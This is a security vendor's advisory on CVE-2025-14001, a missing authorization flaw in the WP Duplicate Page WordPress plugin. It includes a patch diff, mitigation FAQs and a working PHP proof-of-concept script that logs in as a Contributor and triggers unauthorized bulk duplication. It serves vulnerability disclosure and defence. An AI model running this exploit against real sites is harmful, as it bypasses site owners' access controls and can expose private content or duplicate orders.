How does this vulnerability work?

The vulnerability arises from missing capability checks in the ‘duplicateBulkHandle’ and ‘duplicateBulkHandleHPOS’ functions. Authenticated users can exploit this by sending a POST request to duplicate posts, bypassing the role restrictions set in the plugin.

Who is affected by this vulnerability?

Any WordPress site using the WP Duplicate Page plugin version 1.8 or earlier is affected. Specifically, authenticated users with Contributor-level permissions or higher can exploit this vulnerability to duplicate posts and orders.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WP Duplicate Page plugin installed. If it is version 1.8 or earlier, your site is vulnerable. Additionally, you can review access logs for unauthorized duplication actions.

How can I fix this vulnerability?

To fix CVE-2025-14001, update the WP Duplicate Page plugin to version 1.8.1 or later. This version includes a patch that adds necessary authorization checks to prevent unauthorized post duplication.

What does the CVSS score of 5.4 mean?

A CVSS score of 5.4 indicates a medium severity vulnerability. This means that while the risk is not critical, it can lead to unauthorized data exposure or manipulation, making it important to address promptly.

What are the practical risks associated with this vulnerability?

The practical risks include unauthorized duplication of sensitive posts or WooCommerce orders, which can lead to data exposure and logistical issues, such as duplicate order fulfillment. This undermines the site’s role-based access controls.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an authenticated user can exploit the vulnerability by sending a crafted POST request to the WordPress admin endpoint. It shows the steps to authenticate and perform unauthorized duplications.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the WP Duplicate Page plugin until a patch can be applied. Additionally, review user roles and permissions to limit access to only trusted users.

Are there any other security measures I should take?

In addition to patching this vulnerability, ensure that your WordPress installation and all plugins are regularly updated. Implement strong user role management and consider using security plugins that monitor for unauthorized actions.

How can I stay informed about future vulnerabilities?

To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database. Additionally, consider using a vulnerability management tool.

What resources are available for further information?

For more information on CVE-2025-14001, refer to the official CVE database, the plugin’s changelog, and security advisories from reputable sources like the WordPress security team.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14001: WP Duplicate Page <= 1.8 – Missing Authorization to Authenticated (Contributor+) Arbitrary Post Duplication (wp-duplicate-page)

Q: What is CVE-2025-14001?

CVE-2025-14001 is a medium severity vulnerability in the WP Duplicate Page plugin for WordPress, affecting versions up to and including 1.8. It allows authenticated users with Contributor-level access or higher to duplicate arbitrary posts and WooCommerce orders due to missing authorization checks.

CVE ID CVE-2025-14001

Plugin wp-duplicate-page

Severity Medium (CVSS 5.4)

CWE 862

Vulnerable Version 1.8

Patched Version 1.8.1

Disclosed January 11, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14001:
This vulnerability is a missing authorization flaw in the WP Duplicate Page WordPress plugin, affecting versions up to and including 1.8. It allows authenticated users with Contributor-level permissions or higher to duplicate arbitrary posts, pages, and WooCommerce HPOS orders, bypassing the plugin’s configured role restrictions. The CVSS score of 5.4 reflects a medium severity impact.

The root cause is the absence of a capability check in two bulk action handler functions. The `duplicateBulkHandle` function in `/wp-duplicate-page/includes/Classes/ButtonDuplicate.php` (line 53) and the `duplicateBulkHandleHPOS` function (line 78) process bulk duplication requests. Before the patch, these functions immediately executed duplication logic upon matching the action `’wp_duplicate_page_bulk_action’`. They did not verify if the current user had permission to copy posts as defined by the plugin’s `Utils::isCurrentUserAllowedToCopy()` method. This omission allowed users to bypass the plugin’s “Allowed User Roles” setting.

An attacker exploits this by sending a POST request to the WordPress admin bulk actions endpoint. The attacker must be authenticated with at least Contributor privileges. The request targets the post list table in `/wp-admin/edit.php` or the WooCommerce orders page, submitting a bulk action with the name `wp_duplicate_page_bulk_action` and an array of target post or order IDs. No special nonce or additional parameters are required beyond the standard WordPress bulk action parameters, as the missing authorization check is the sole vulnerability.

The patch adds an authorization check at the beginning of both vulnerable functions. In `ButtonDuplicate.php`, lines 56 and 83 now call `if ( ! Utils::isCurrentUserAllowedToCopy() ) { return $redirect; }`. This function validates the user’s role against the plugin’s settings. The patch also updates the plugin version to 1.8.1 in `wp-duplicate-page.php`. Before the patch, any authenticated user triggering the bulk action could duplicate posts. After the patch, the function exits early if the user is not explicitly permitted by the plugin’s configuration, preventing unauthorized duplication.

Successful exploitation leads to unauthorized data duplication. Attackers can duplicate any post, page, or WooCommerce order, potentially exposing sensitive information from drafts or private content. For WooCommerce sites, this could result in duplicate order fulfillment, causing logistical and financial issues. The vulnerability undermines the plugin’s role-based access control, allowing users to perform actions explicitly denied by the site administrator.

Differential between vulnerable and patched code

Code Diff

--- a/wp-duplicate-page/includes/Classes/ButtonDuplicate.php
+++ b/wp-duplicate-page/includes/Classes/ButtonDuplicate.php
@@ -53,6 +53,9 @@

 	public function duplicateBulkHandle( $redirect, $action, $postIds ) {
 		if ( 'wp_duplicate_page_bulk_action' === $action ) {
+			if ( ! Utils::isCurrentUserAllowedToCopy() ) {
+				return $redirect;
+			}
 			// Get the original post
 			$counter = 0;
 			if ( is_array( $postIds ) ) {
@@ -78,6 +81,9 @@

 	public function duplicateBulkHandleHPOS( $redirect, $action, $ids ) {
 		if ( 'wp_duplicate_page_bulk_action' === $action ) {
+			if ( ! Utils::isCurrentUserAllowedToCopy() ) {
+				return $redirect;
+			}
 			$counter = 0;
 			if ( is_array( $ids ) ) {
 				foreach ( $ids as $orderId ) {
--- a/wp-duplicate-page/wp-duplicate-page.php
+++ b/wp-duplicate-page/wp-duplicate-page.php
@@ -1,9 +1,9 @@
 <?php
 /**
  * Plugin Name: WP Duplicate Page
- * Plugin URI: https://ninjateam.org/wp-duplicate-page/
+ * Plugin URI: https://ninjateam.org
  * Description: Duplicate Posts, Pages and Custom Post Types.
- * Version: 1.8
+ * Version: 1.8.1
  * Author: NinjaTeam
  * Author URI: https://ninjateam.org
  * Text Domain: wp-duplicate-page
@@ -16,7 +16,7 @@

 defined( 'ABSPATH' ) || exit;

-define( 'NJT_DUPLICATE_VERSION', '1.8' );
+define( 'NJT_DUPLICATE_VERSION', '1.8.1' );
 define( 'NJT_DUPLICATE_DOMAIN', 'wp-duplicate-page' );

 define( 'NJT_DUPLICATE_PLUGIN_DIR', __DIR__ );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14001 - WP Duplicate Page <= 1.8 - Missing Authorization to Authenticated (Contributor+) Arbitrary Post Duplication
<?php

$target_url = 'https://vulnerable-site.com';
$username = 'contributor';
$password = 'password';
$post_ids_to_duplicate = [123, 456]; // Array of target post/order IDs

// Initialize cURL session for login
$ch = curl_init();

// Step 1: Authenticate and obtain WordPress session cookies
$login_url = $target_url . '/wp-login.php';
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save cookies to file
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Adjust for production

$response = curl_exec($ch);

// Step 2: Perform bulk duplication action via POST to the posts list page
$bulk_action_url = $target_url . '/wp-admin/edit.php';
$post_fields = [
    'action' => 'wp_duplicate_page_bulk_action', // The vulnerable bulk action identifier
    'action2' => '-1',
    'post[]' => $post_ids_to_duplicate // Array of IDs to duplicate
];

curl_setopt($ch, CURLOPT_URL, $bulk_action_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));

$response = curl_exec($ch);

// Check for success indicators (e.g., redirect, admin notices)
if (strpos($response, 'Post duplicated successfully') !== false || curl_getinfo($ch, CURLINFO_HTTP_CODE) === 302) {
    echo "[+] Bulk duplication attempt executed.n";
} else {
    echo "[-] Duplication may have failed or site is not vulnerable.n";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-14001?
Overview of the vulnerability
CVE-2025-14001 is a medium severity vulnerability in the WP Duplicate Page plugin for WordPress, affecting versions up to and including 1.8. It allows authenticated users with Contributor-level access or higher to duplicate arbitrary posts and WooCommerce orders due to missing authorization checks.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing capability checks in the ‘duplicateBulkHandle’ and ‘duplicateBulkHandleHPOS’ functions. Authenticated users can exploit this by sending a POST request to duplicate posts, bypassing the role restrictions set in the plugin.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the WP Duplicate Page plugin version 1.8 or earlier is affected. Specifically, authenticated users with Contributor-level permissions or higher can exploit this vulnerability to duplicate posts and orders.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the WP Duplicate Page plugin installed. If it is version 1.8 or earlier, your site is vulnerable. Additionally, you can review access logs for unauthorized duplication actions.
How can I fix this vulnerability?
Mitigation and patching
To fix CVE-2025-14001, update the WP Duplicate Page plugin to version 1.8.1 or later. This version includes a patch that adds necessary authorization checks to prevent unauthorized post duplication.
What does the CVSS score of 5.4 mean?
Understanding severity ratings
A CVSS score of 5.4 indicates a medium severity vulnerability. This means that while the risk is not critical, it can lead to unauthorized data exposure or manipulation, making it important to address promptly.
What are the practical risks associated with this vulnerability?
Potential impact on WordPress sites
The practical risks include unauthorized duplication of sensitive posts or WooCommerce orders, which can lead to data exposure and logistical issues, such as duplicate order fulfillment. This undermines the site’s role-based access controls.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an authenticated user can exploit the vulnerability by sending a crafted POST request to the WordPress admin endpoint. It shows the steps to authenticate and perform unauthorized duplications.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the WP Duplicate Page plugin until a patch can be applied. Additionally, review user roles and permissions to limit access to only trusted users.
Are there any other security measures I should take?
Enhancing overall security
In addition to patching this vulnerability, ensure that your WordPress installation and all plugins are regularly updated. Implement strong user role management and consider using security plugins that monitor for unauthorized actions.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database. Additionally, consider using a vulnerability management tool.
What resources are available for further information?
Finding more details on CVE-2025-14001
For more information on CVE-2025-14001, refer to the official CVE database, the plugin’s changelog, and security advisories from reputable sources like the WordPress security team.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations